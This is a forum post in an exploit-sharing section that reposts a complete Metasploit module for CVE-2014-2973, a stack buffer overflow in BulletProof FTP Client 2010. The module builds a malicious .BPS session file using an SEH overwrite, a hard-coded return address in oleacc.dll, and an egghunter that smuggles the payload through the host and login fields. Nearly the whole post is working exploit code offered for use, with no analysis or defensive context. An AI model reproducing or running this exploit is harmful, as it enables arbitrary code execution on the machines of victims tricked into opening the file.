Jump to content
Aerosol

BulletProof FTP Client BPS Buffer Overflow

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BulletProof FTP Client BPS Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        BulletProof FTP Client 2010, caused by an overly long hostname.
        By persuading the victim to open a specially-crafted .BPS file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gabor Seljan'
        ],
      'References'     =>
        [
          [ 'EDB', '34162' ],
          [ 'EDB', '34540' ],
          [ 'EDB', '35449' ],
          [ 'OSVDB', '109547' ],
          [ 'CVE', '2014-2973' ],
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars'   => "\x00\x0a\x0d\x1a",
          'Space'      => 2000
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Offset' => 89,
              'Ret'    => 0x74c86a98  # POP EDI # POP ESI # RET [oleacc.dll]
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 24 2014',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.bps'])
      ],
    self.class)
  end

  def exploit
    eggoptions = {
      :checksum => true,
      :eggtag => 'w00t'
    }

    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

    sploit = "This is a BulletProof FTP Client Session-File and should not be modified directly.\r\n"
    sploit << rand_text_alpha(target['Offset'])
    sploit << generate_seh_record(target.ret)
    sploit << hunter               + "\r\n"  # FTP Server HOST / IP
    sploit << rand_text_numeric(5) + "\r\n"  # Port number
    sploit << egg                  + "\r\n"  # Login name
    sploit << rand_text_alpha(8)   + "\r\n"  # Login password

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(sploit)
  end

end

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...